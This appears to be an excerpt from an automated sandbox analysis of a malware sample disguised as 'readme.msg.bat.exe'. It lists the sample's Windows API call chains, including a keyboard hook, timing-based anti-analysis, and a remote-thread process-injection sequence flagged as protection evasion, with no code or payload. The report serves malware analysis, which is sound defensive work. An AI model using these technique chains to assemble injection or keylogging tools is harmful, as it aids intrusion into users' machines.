Source: C:\Users\user\Desktop\readme.msg.bat.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040C1D0 rdtsc 0_2_0040C1D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041F660 LoadLibraryA,GetProcAddress,SetWindowsHookExA, 0_2_0041F660
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004210D0 GetProcessHeap,GetProcessHeap,HeapAlloc,RegOpenKeyExA,GetLastError,GetProcessHeap,HeapFree,RegCloseKey, 0_2_004210D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0042731A SetUnhandledExceptionFilter, 0_2_0042731A
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0042732E SetUnhandledExceptionFilter, 0_2_0042732E

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00404840 OpenProcess,lstrlenA,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,CreateRemoteThread, 0_2_00404840
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00423260 GetProcessHeap,HeapAlloc,HeapAlloc,HeapAlloc,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,InitializeSecurityDescriptor,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,GetTokenInformation,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,AllocateAndInitializeSid,GetLengthSid,AddAce,AllocateAndInitializeSid,GetLengthSid,AddAce,AllocateAndInitializeSid,GetLengthSid,AddAce,IsValidSecurityDescriptor, 0_2_00423260
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: GetLocaleInfoA, 0_2_0042C8B2
Source: C:\Windows\SysWOW64\notepad.exe Queries volume information: C:\Users\user\Desktop\A853.tmp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00401830 ExpandEnvironmentStringsA,GetLocalTime,CreateFileA,CloseHandle, 0_2_00401830
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040BE00 lstrlenA,GetLocalTime,GetTimeZoneInformation,lstrlenA, 0_2_0040BE00
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00425D91 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,__wincmdln,GetModuleHandleA, 0_2_00425D91
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs